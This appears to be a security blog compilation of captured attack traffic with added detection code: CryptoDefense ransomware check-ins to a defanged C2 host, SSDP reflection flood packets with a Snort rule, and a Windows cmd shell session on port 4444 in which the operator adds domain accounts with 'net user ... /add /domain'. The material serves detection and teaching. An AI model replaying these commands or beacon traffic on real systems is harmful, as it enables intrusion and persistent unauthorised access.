
CryptoDefense Ransomware PCAP Traffic Sample Malware – How to decrypt your files

Solution – Step 1 – Remove the malware first. Run a current anti-malware scanner (the original post links a free Kaspersky trial for this) so the ransomware cannot re-encrypt whatever you recover.

Solution – Step 2 – Don’t pay the ransom. There is a solution for CryptoDefense (and a separate one for CryptoLocker); the CryptoDefense procedure below is from bleepingcomputer.com. It only applies to infections from before April 1st, 2014, when the malware still left its private key on the infected machine, so establish the infection date first and take a disk image before running any recovery tool.

How to restore files encrypted by CryptoDefense using the Emsisoft Decryptor

If you were infected before April 1st, 2014 then you may have been infected with a variant that mistakenly left the private decryption key behind on the computer. To begin please download decrypt_cryptodefense.zip from the following URL and save it to your desktop.

http://tmp.emsisoft.com/fw/decrypt_cryptodefense.zip

Here is a sample of what the network traffic looks like (traffic sample donated by one of our subscribers). Four things stand out and together make a usable network signature: each check-in is an HTTP POST to a random, extension-less path on machetesraka[.]com; the body is a single one-letter form field carrying an 86-character blob (hence Content-Length: 88); every request sends Connection: Close and Cache-Control: no-cache; and none carries the Referer or Accept-Language headers a browser form submission would. The values below contain characters outside 0-9a-f, so they are not the raw hex the malware sends; treat them as a sample of the shape only.

POST /dhcpshm1b8he4y HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 88
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)
Host: machetesraka[.]com
Cache-Control: no-cache

y=b235aj04825c514b4995676755202a2dc9ccb1dbe13d4e69035dsdg36473f9122eecdefe948c341ba718b1

POST /a9he8f4z2j332 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 88
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)
Host: machetesraka[.]com
Cache-Control: no-cache

z=a832jf842084b936eb1327f8eee774ca252373e9f93c44e7420f3909f2e569a0b772f033a904e8cc767b6c

POST /bwadw33tbbae2 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 88
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)
Host: machetesraka[.]com
Cache-Control: no-cache

w=ccc346456aef8320d4ab3c64e26b9e1576cf4289d05bbsdrr3452bbc16576045eaf5e8aa5aa5937452baj3

POST /3lt1ojfs8yz HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 88
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)
Host: machetesraka[.]com
Cache-Control: no-cache

z=eeeesf352aa235b2b1e5cd6dbad353213699923jbaej4e7643jfjseeb6d4860f51d24daf1144ffdc98456b
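The following is an added example, not part of the original post, that turns the observations above into a scoring check you can run over captured HTTP requests. The four check-ins are re-assembled from the listing (the header set is the one shown; the values are copied as printed), and the benign login POST is constructed here to show that ordinary form traffic scores low. The thresholds and the indicator names are assumptions of this example, not anything the malware or the page defines.

```python
import re

# User-Agent string from the capture (Vista-era MSIE 7 with .NET CLR tokens).
CAPTURED_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0; SLCC1; "
               ".NET CLR 2.0.50727; .NET CLR 3.0.30729;  .NET CLR 3.5.30729; .NET4.0C)")


def make_checkin(host, path, body, user_agent=CAPTURED_UA):
    """Re-assemble one raw request with the header set seen in the capture (constructed sample)."""
    lines = [f"POST {path} HTTP/1.1", "Accept: */*",
             "Content-Type: application/x-www-form-urlencoded", "Connection: Close",
             f"Content-Length: {len(body)}", f"User-Agent: {user_agent}",
             f"Host: {host}", "Cache-Control: no-cache"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


# The four check-ins from the page (values copied as printed there, defanged host kept).
SAMPLE_BEACONS = [
    make_checkin("machetesraka[.]com", "/dhcpshm1b8he4y",
                 "y=b235aj04825c514b4995676755202a2dc9ccb1dbe13d4e69035dsdg36473f9122eecdefe948c341ba718b1"),
    make_checkin("machetesraka[.]com", "/a9he8f4z2j332",
                 "z=a832jf842084b936eb1327f8eee774ca252373e9f93c44e7420f3909f2e569a0b772f033a904e8cc767b6c"),
    make_checkin("machetesraka[.]com", "/bwadw33tbbae2",
                 "w=ccc346456aef8320d4ab3c64e26b9e1576cf4289d05bbsdrr3452bbc16576045eaf5e8aa5aa5937452baj3"),
    make_checkin("machetesraka[.]com", "/3lt1ojfs8yz",
                 "z=eeeesf352aa235b2b1e5cd6dbad353213699923jbaej4e7643jfjseeb6d4860f51d24daf1144ffdc98456b"),
]

# Constructed benign form post (same User-Agent) to show the score stays low on normal traffic.
BENIGN_POST = ("POST /login HTTP/1.1\r\nHost: intranet.example\r\nUser-Agent: " + CAPTURED_UA +
               "\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Language: en-US\r\n"
               "Referer: http://intranet.example/login\r\nContent-Length: 22\r\n\r\nuser=alice&pass=secret")


def parse_request(raw):
    """Split a raw HTTP request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


# Assumed shape of the beacon: short random lowercase/digit path with no extension,
# and a body of exactly one single-letter key with a long alphanumeric value.
RANDOM_PATH = re.compile(r"^/[a-z0-9]{8,20}$")
BLOB_BODY = re.compile(r"^[a-z]=[0-9a-z]{64,}$")


def beacon_indicators(raw):
    """Return the list of indicators a request matches; each is one observation from the capture."""
    method, path, headers, body = parse_request(raw)
    hits = []
    if method == "POST" and headers.get("content-type") == "application/x-www-form-urlencoded":
        hits.append("form-post")
    if RANDOM_PATH.match(path):
        hits.append("random-path")
    if BLOB_BODY.match(body):
        hits.append("single-key-blob")
    if headers.get("connection", "").lower() == "close" and headers.get("cache-control") == "no-cache":
        hits.append("close+nocache")
    if "accept-language" not in headers and "referer" not in headers:
        hits.append("no-browser-headers")   # a browser form submission carries both
    return hits


def flag_beacons(raw_requests, min_hits=4):
    """Return (host, path, indicators) for every request that scores like a CryptoDefense check-in."""
    out = []
    for raw in raw_requests:
        hits = beacon_indicators(raw)
        if len(hits) >= min_hits:
            _, path, headers, _ = parse_request(raw)
            out.append((headers.get("host"), path, hits))
    return out


if __name__ == "__main__":
    for host, path, hits in flag_beacons(SAMPLE_BEACONS + [BENIGN_POST]):
        print(host, path, ",".join(hits))
```

The single-key-blob and random-path indicators carry the weight; the User-Agent is deliberately not scored, because it is a plausible real browser string and the same family could change it without touching the check-in format.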

 


SSDP Distributed Reflection Denial of Service (DrDoS) Attacks may be biggest threat – Traffic Sample & Snort Rule

SSDP Distributed Reflection Denial of Service attacks are on the rise and may be the biggest threat right now. SSDP does not have the largest amplification factor, but it probably has the largest pool of abusable reflectors: open source reports put the number of internet-exposed, vulnerable UPnP devices at over 5 million worldwide as of August 2015. One of our dedicated servers was attacked by one of these DoSnets earlier this morning. We counted over 155,000 unique source IP addresses and saw bandwidth spike from 100 MB/sec to 500 MB/sec; with that much packet loss the numbers are approximate. So what does this attack look like? Here are a few packets with the reflectors’ source IP addresses stripped out (shown as 1.1.1.1) so as not to hand attackers a ready-made reflector list. Note the shape: every packet is an unsolicited SSDP search response (HTTP/1.1 200 OK with Location, ST and USN headers) from UDP source port 1900, delivered to UDP port 80 on the victim, which is simply the source port the attacker spoofed in the M-SEARCH requests.

2015-08-22 02:09:11 IP 1.1.1.1.1900 > 192.168.1.108.80: UDP, length 259
….E…..@.8….3….w..l.P….HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:upnp:rootdevice
USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

2015-08-22 02:09:11 IP 1.1.1.1.1900 > 192.168.1.108.80: UDP, length 268
….E..(..@.8….3….w..l.P..DSHTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

….E…..@.6….v.S..w..l.P…CHTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100
Cache-Control:max-age=1800
ST:upnp:rootdevice
USN:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100::upnp:rootdevice

….E..g..@.8.
..3….w..l.P.S..HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1
USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::urn:schemas-upnp-org:device:InternetGatewayDevice:1

….E..(..@.6….v.S..w..l.P…
HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100
Cache-Control:max-age=1800
ST:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100
USN:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100

….E(.!w.@.:…..M…w..l.P.^M+UHTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.254:5431/dyndev/uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0
Cache-Control:max-age=1800
ST:upnp:rootdevice
USN:uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0::upnp:rootdevice

….E(.*w.@.:…..M…w..l.P…=HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.254:5431/dyndev/uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0
Cache-Control:max-age=1800
ST:uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0
USN:uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0

….E..g..@.6….v.S..w..l.P.S{.HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100
Cache-Control:max-age=1800
ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1
USN:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100::urn:schemas-upnp-org:device:InternetGatewayDevice:1

….E…w.@.7..Dl(….w..l.P….HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:upnp:rootdevice
USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

….E..(..@.8.. .3….w..l.P….HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:uuid:0000b018-d0a0-00b0-f0a0-486801b8f8d8
USN:uuid:0000b018-d0a0-00b0-f0a0-486801b8f8d8

….E.._..@.6….v.S..w..l.P.K.%HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100
Cache-Control:max-age=1800
ST:urn:schemas-upnp-org:service:Layer3Forwarding:1
USN:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100::urn:schemas-upnp-org:service:Layer3Forwarding:1

….E…`.@.8..F.7H…w..l.P..MZHTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:upnp:rootdevice
USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

….E(.iw.@.:…..M…w..l.P.U#.HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.254:5431/dyndev/uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0
Cache-Control:max-age=1800
ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1
USN:uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0::urn:schemas-upnp-org:device:InternetGatewayDevice:1

….E… .@.9.:.l*} ..w..l.P..Z.HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:upnp:rootdevice
USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

….E…..@.8…l^M.0..w..l.P… HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:upnp:rootdevice
USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

….E..(..@.6….v.S..w..l.P… HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4100
Cache-Control:max-age=1800
ST:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4101
USN:uuid:cc5d4e7c-2f41-412f-7c4e-5dcc5d7c4101

….E…Bk@.8.i.d 5…w..l.P….HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:upnp:rootdevice
USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

….E..O..@.8.
..3….w..l.P.; *HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:urn:schemas-upnp-org:device:WANDevice:1
USN:uuid:0000b018-d0a0-00b0-f0a0-486801b8f8d8::urn:schemas-upnp-org:device:WANDevice:1

….E..gw.@.7…l(….w..l.P.S
3HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1
USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::urn:schemas-upnp-org:device:InternetGatewayDevice:1

….E….[@.7.qrl(….w..l.P..+^HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:upnp:rootdevice
USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

….E(.*w.@.:…..M…w..l.P…gHTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.254:5431/dyndev/uuid:0000e0f8-20a0-00e0-80a0-48b8005808e0
Cache-Control:max-age=1800
ST:uuid:0000e0f8-20a0-00e0-80a0-48b801582808
USN:uuid:0000e0f8-20a0-00e0-80a0-48b801582808

….E..( .@.9.:.l*} ..w..l.P…8HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0

….E…’.@.8….<….w..l.P…~HTTP/1.1 200 OK
Server: Custom/1.0 UPnP/1.0 Proc/Ver
EXT:
Location: hxxp://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0
Cache-Control:max-age=1800
ST:upnp:rootdevice
USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice

You can see that the source port for the attack is 1900, so make sure your edge ACLs drop inbound UDP traffic with source port 1900; no host on your network should be receiving SSDP replies from the internet, so this costs nothing. Keep in mind that the reflected replies land on whatever port the attacker spoofed in the M-SEARCH (UDP/80 in the capture above), so filter on the source port, not the destination. Detecting this type of attack with Snort is also simple; here is a sample SSDP DrDoS rule:

alert udp $EXTERNAL_NET 1900 -> $HOME_NET any (msg:”Possible SSDP DrDoS attack - flood of SSDP search replies from the internet”; content:”HTTP/1.1 200 OK”; depth:15; content:”Location|3a 20|http”; nocase; content:”USN|3a|uuid|3a|”; nocase; detection_filter:track by_dst, count 100, seconds 10; reference:url,www.computersecurity.org; classtype:attempted-dos; sid:1000001; rev:2;)

A few notes on the rule. The keyword is lower-case alert. SIDs below 1,000,000 are reserved for the distributed rulesets, so local rules start at 1000001. The Location header in the replies is written with a space after the colon (the hxxp above is only there to defang the URL), so the content match has to include that space or it never fires. Finally, without the detection_filter the rule alerts on every single reply, including the legitimate ones your own UPnP devices send on the LAN; with $EXTERNAL_NET as the source and a count of 100 replies to one destination in 10 seconds you only alert on a flood from outside, which is the only thing this traffic can be. The content matches are more than enough on their own; offset, depth and distance modifiers would only tighten them further.
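The same detection logic as the rule above, written as an added example (not from the original post) that you can run over tcpdump summary output offline. The two summary lines from the capture are used as-is; the other 120 reflectors, the legitimate LAN reply and the threshold of 100 distinct sources in 10 seconds are constructed for this example.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# tcpdump summary line as printed above, e.g.
# "2015-08-22 02:09:11 IP 1.1.1.1.1900 > 192.168.1.108.80: UDP, length 259"
SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): UDP, length (?P<length>\d+)$")

# The first reply from the capture, as it would sit in the UDP payload.
SAMPLE_REPLY = (b"HTTP/1.1 200 OK\r\nServer: Custom/1.0 UPnP/1.0 Proc/Ver\r\nEXT:\r\n"
                b"Location: http://192.168.1.1:5431/dyndev/uuid:0000b018-d0a0-00b0-f0a0-486800b808b0\r\n"
                b"Cache-Control:max-age=1800\r\nST:upnp:rootdevice\r\n"
                b"USN:uuid:0000b018-d0a0-00b0-f0a0-486800b808b0::upnp:rootdevice\r\n\r\n")


def parse_summary(line):
    """Return a dict for one tcpdump UDP summary line, or None for any other line."""
    m = SUMMARY_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    return {"ts": datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S"),
            "src": d["src"], "sport": int(d["sport"]),
            "dst": d["dst"], "dport": int(d["dport"]), "length": int(d["length"])}


def parse_lines(lines):
    return [r for r in map(parse_summary, lines) if r]


def is_ssdp_reply(payload):
    """Payload test equivalent to the Snort content matches: an SSDP M-SEARCH response."""
    low = payload.lower()
    return payload.startswith(b"HTTP/1.1 200 OK") and b"location:" in low and b"usn:uuid:" in low


def detect_reflection(records, window=timedelta(seconds=10), min_sources=100):
    """
    Flag victims that receive SSDP replies (UDP source port 1900) from at least
    `min_sources` distinct hosts inside any `window`-long interval.  A real host
    only ever gets a handful of replies, from its own LAN, and only after it
    sent an M-SEARCH itself.  Records that carry a payload are also checked
    against is_ssdp_reply, like the rule's content matches.
    """
    by_dst = defaultdict(list)
    for r in records:
        if r["sport"] != 1900:
            continue
        if "payload" in r and not is_ssdp_reply(r["payload"]):
            continue
        by_dst[r["dst"]].append(r)
    alerts = {}
    for dst, recs in by_dst.items():
        recs.sort(key=lambda r: r["ts"])
        in_window, start, bytes_seen = Counter(), 0, 0
        for r in recs:                       # sliding window over the sorted replies
            in_window[r["src"]] += 1
            bytes_seen += r["length"]
            while r["ts"] - recs[start]["ts"] > window:
                old = recs[start]
                in_window[old["src"]] -= 1
                if in_window[old["src"]] == 0:
                    del in_window[old["src"]]
                bytes_seen -= old["length"]
                start += 1
            if len(in_window) >= min_sources and len(in_window) > alerts.get(dst, {}).get("sources", 0):
                alerts[dst] = {"window_start": recs[start]["ts"], "sources": len(in_window), "bytes": bytes_seen}
    return alerts


def build_sample():
    """Constructed sample: the page's two lines, 120 synthetic reflectors in 203.0.113.0/24 hitting the
    same victim over two seconds, one legitimate LAN reply to another host, and one M-SEARCH."""
    lines = ["2015-08-22 02:09:11 IP 1.1.1.1.1900 > 192.168.1.108.80: UDP, length 259",
             "2015-08-22 02:09:11 IP 1.1.1.1.1900 > 192.168.1.108.80: UDP, length 268"]
    for i in range(120):
        lines.append(f"2015-08-22 02:09:{11 + i // 60} IP 203.0.113.{i + 1}.1900 > 192.168.1.108.80: UDP, length 300")
    lines.append("2015-08-22 02:09:12 IP 192.168.1.1.1900 > 192.168.1.50.52341: UDP, length 259")
    lines.append("2015-08-22 02:09:12 IP 192.168.1.50.52341 > 239.255.255.250.1900: UDP, length 133")
    return lines


if __name__ == "__main__":
    for victim, info in detect_reflection(parse_lines(build_sample())).items():
        print(victim, info)
```

Counting distinct sources rather than packets is what separates this from a rate limit: a single chatty LAN device can send hundreds of replies, but only a reflection flood brings hundreds of distinct senders.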


Converted PCAP sample of a Microsoft Windows Reverse Shell

Converted PCAP sample of a Microsoft Windows command shell served over port 4444. In the capture the compromised Windows host is 192.168.1.104 and the operator is 192.168.1.109, which connects from ephemeral port 40033 to a listener (Netcat, per the original note) on port 4444 of the compromised host; as soon as the connection is made, cmd.exe is attached to it and the Windows banner goes across the wire. Strictly speaking that makes this a bind shell, since the operator connects in to the victim. In a reverse shell the victim initiates the outbound connection to a listener on the attacker’s machine, which is the variant seen more often today because it passes through NAT and outbound-permissive firewalls. Either way the traffic is identical once the shell is up: the cmd.exe banner and prompt in one direction and commands in the other, all in clear text, so a content match on "Microsoft Windows [Version" on a non-standard port is an easy catch. You can see that once the shell is spawned two users are created with the /domain switch. This style of access is not seen as much as it once was; in the old days many individuals and companies ran Remote Desktop on port 3389 open to the public, letting attackers create users and log in directly as if they were sitting at the machine. If you are going to run RDP, ACL it to your internal network or a VPN, require Network Level Authentication and strong credentials, and use TLS.


2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 1:37, ack 1, win 238, length 36
E..L…….
.#…sQ…….P…….Microsoft Windows [Version 6.0.6001]
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 1:37, ack 1, win 238, length 36
E..L……
.#…sQ…….P…….Microsoft Windows [Version 6.0.6001]
2015-01-19 12:37:15 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [.], ack 37, win 16551, length 0
.#.(7.@.x.. .
.<..s……Q…P……….
2015-01-19 12:37:15 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [.], ack 37, win 1651, length 0
.#.(.@.x.. .
.<..s……QP.@…..
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 37:117, ack 1, win 248, length 80
E..x..@…..
…sQ…….P…….
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows>
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 37:117, ack 1, win 252, length 66
E..x..@…..
.#…sQ…….P…….
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows>
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 1:49, ack 117, win 16531, length 48
.#.X7.@.x….
.<..s……Q..0P.@…..net user Chris.James Pwnz3d /add /domain
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 1:49, ack 117, win 16531, length 48
.#.X7.@.x….
.<..s……Q..0P.@…..net user Chris.James Pwnz3d /add /domain
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 49:51, ack 117, win 16534, length 2
.#.*7.@.x….
.<..s……Q..0P.@…..
….
2015-01-19 12:39:33 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 51:100, ack 180, win 16515, length 49
.#.Y7.@.x….
.<..s……Q..oP.@…..net user Josh.Brown Pwnz3d /add /domain
2015-01-19 12:39:33 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 51:100, ack 180, win 16515, length 49
.#.Y7.@.x….
.<..s……Q..oP.@…..net user Josh.Brown Pwnz3d /add /domain
2015-01-19 12:39:50 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 333:385, ack 152, win 258, length 52
E..\!.@….
.#…sQ…….P…….The command completed successfully.

C:\Windows>
2015-01-19 12:39:50 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 333:385, ack 152, win 258, length 52
E..\!.@….
.#…sQ…….P…….The command completed successfully.
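An added example (not part of the original post) that does the triage described above on the payload-bearing segments of this capture: it reassembles each direction of the TCP stream, drops the duplicated segments the listing shows, finds the cmd.exe banner, and pulls out the account-creation commands. The segments below are copied from the capture with the payloads trimmed to the visible text; the bind-versus-reverse heuristic and the localgroup/group command forms are assumptions of this example.

```python
import re

# Constructed sample: the payload-bearing segments above as (src, sport, dst, dport, seq, payload).
# The listing shows several segments twice, so two duplicates are kept here to exercise the de-dup.
SAMPLE_SEGMENTS = [
    ("192.168.1.104", 4444, "192.168.1.109", 40033, 1, b"Microsoft Windows [Version 6.0.6001]"),
    ("192.168.1.104", 4444, "192.168.1.109", 40033, 1, b"Microsoft Windows [Version 6.0.6001]"),
    ("192.168.1.104", 4444, "192.168.1.109", 40033, 37,
     b"\r\nCopyright (c) 2006 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Windows>"),
    ("192.168.1.109", 40033, "192.168.1.104", 4444, 1, b"net user Chris.James Pwnz3d /add /domain"),
    ("192.168.1.109", 40033, "192.168.1.104", 4444, 1, b"net user Chris.James Pwnz3d /add /domain"),
    ("192.168.1.109", 40033, "192.168.1.104", 4444, 49, b"\r\n"),
    ("192.168.1.109", 40033, "192.168.1.104", 4444, 51, b"net user Josh.Brown Pwnz3d /add /domain\r\n"),
    ("192.168.1.104", 4444, "192.168.1.109", 40033, 333,
     b"The command completed successfully.\r\n\r\nC:\\Windows>"),
]

BANNER_RE = re.compile(rb"Microsoft Windows \[Version [\d.]+\]")
# The page shows 'net user ... /add'; the localgroup/group forms are added here as the
# obvious follow-on an operator runs next (assumption of this example).
ACCOUNT_CMD_RE = re.compile(rb"net\s+(?:user|localgroup|group)\s+\S+.*?/add\b[^\r\n]*", re.IGNORECASE)


def reassemble(segments):
    """Concatenate each direction's payload in sequence order, dropping duplicate/retransmitted segments."""
    streams, seen = {}, set()
    for src, sport, dst, dport, seq, payload in segments:
        key = (src, sport, dst, dport)
        if (key, seq) in seen:
            continue
        seen.add((key, seq))
        streams.setdefault(key, []).append((seq, payload))
    return {k: b"".join(p for _, p in sorted(v)) for k, v in streams.items()}


def find_cmd_shells(segments):
    """Locate clear-text cmd.exe sessions and the account commands typed into them."""
    findings = []
    streams = reassemble(segments)
    for (src, sport, dst, dport), data in streams.items():
        if not BANNER_RE.search(data):
            continue
        # The side that sends the banner is where cmd.exe runs; commands come from the other side.
        peer_stream = streams.get((dst, dport, src, sport), b"")
        commands = [c.decode(errors="replace").strip() for c in ACCOUNT_CMD_RE.findall(peer_stream)]
        # Heuristic (assumption): a fixed low port on the shell host and an ephemeral port on the
        # peer means the peer connected in (bind shell); the opposite means the shell host
        # connected out (reverse shell).
        if sport < 32768 <= dport:
            kind = "bind"
        elif dport < 32768 <= sport:
            kind = "reverse"
        else:
            kind = "unknown"
        findings.append({"shell_host": f"{src}:{sport}", "operator": f"{dst}:{dport}",
                         "kind": kind, "account_commands": commands})
    return findings


if __name__ == "__main__":
    for f in find_cmd_shells(SAMPLE_SEGMENTS):
        print(f)
```

Run against a real capture, the segments would come from a PCAP parser rather than a hand-built list, but the reassembly and matching are the same; the banner regex is the part worth keeping, since it does not depend on the port.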


